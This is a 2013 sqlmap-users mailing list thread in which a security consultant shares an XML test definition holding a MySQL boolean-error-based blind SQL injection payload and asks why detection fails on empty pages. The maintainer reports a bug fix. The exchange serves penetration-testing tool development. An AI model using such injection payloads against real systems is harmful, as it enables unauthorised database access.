Re: [sqlmap-users] Non-Detected SQLi
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Non-Detected SQLi
|
From: Miroslav S. <mir...@gm...> - 2013-06-10 10:23:06
|
Hi Sebastian. There was indeed a bug [1]. Find it fixed now. If you would like to contribute this payload we could include it into sqlmap :) Kind regards, Miroslav Stampar [1] https://github.com/sqlmapproject/sqlmap/issues/462 On Mon, Jun 10, 2013 at 11:30 AM, Sebastian Nerz <seb...@sy...>wrote: > Hi there, > > I wrote a small payload, to test for conditional error-based > SQL-injection possibilities: > > <!-- Boolean-error-based blind tests - WHERE/HAVING clause --> > <test> > <title>AND boolean-error-based blind - WHERE or HAVING clause > (MySQL)</title> > <stype>1</stype> > <level>1</level> > <risk>1</risk> > <clause>1</clause> > <where>1</where> > <vector>REGEXP IF([INFERENCE],1,"")</vector> > <request> > <payload>REGEXP IF([RANDNUM]=[RANDNUM],1,"")</payload> > </request> > <response> > <comparison>REGEXP IF([RANDNUM]=[RANDNUM1],1,"")</comparison> > </response> > <details> > <dbms>MySQL</dbms> > </details> > </test> > > > Theoretically it is working - as long as the server is actually > returning content, the injection is detected and works just fine (feel > free to add it to the sqlmap repository, if it is correct :) ). But a > soon as the tested URL is returning an empty page, detection fails. > > * With a TRUE request, the server returns a content-length of 0 > * With a FALSE request, the server returns the error message > > Now ... for my understanding, this is quite a difference, but SQLMAP > fails to recognize it, even with "not-string" given. The problem might > be, that the server returns a warning during the dynamic-check as well. > Is it possible to forbid the usage of ' during this test? > > What am I doing wrong? Is there an error in the payload above? Can > sqlmap handle empty pages? > > Thanks! > > Kind regards, > > Sebastian Nerz > -- > Sebastian Nerz > Dipl.-Inform. > IT-Security Consultant > > mailto:seb...@sy... > ___________________________________________________________ > > SySS GmbH > Wohlboldstraße 8 > 72072 Tübingen > Germany > Voice: +49 7071 407856-31 > Fax: +49 7071 407856-19 > WWW: http://www.syss.de > > PGP FP: 79DC 2CEC D18D F92F CBB4 AF09 D12D 26A4 9180 FDB2 > > Geschaeftsfuehrer Sebastian Schreiber > Registergericht: Amtsgericht Stuttgart / HRB 382420 > Steuernummer: 86118 / 55809 > > > > > ------------------------------------------------------------------------------ > How ServiceNow helps IT people transform IT departments: > 1. A cloud service to automate IT design, transition and operations > 2. Dashboards that offer high-level views of enterprise services > 3. A single system of record for all IT processes > http://p.sf.net/sfu/servicenow-d2d-j > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
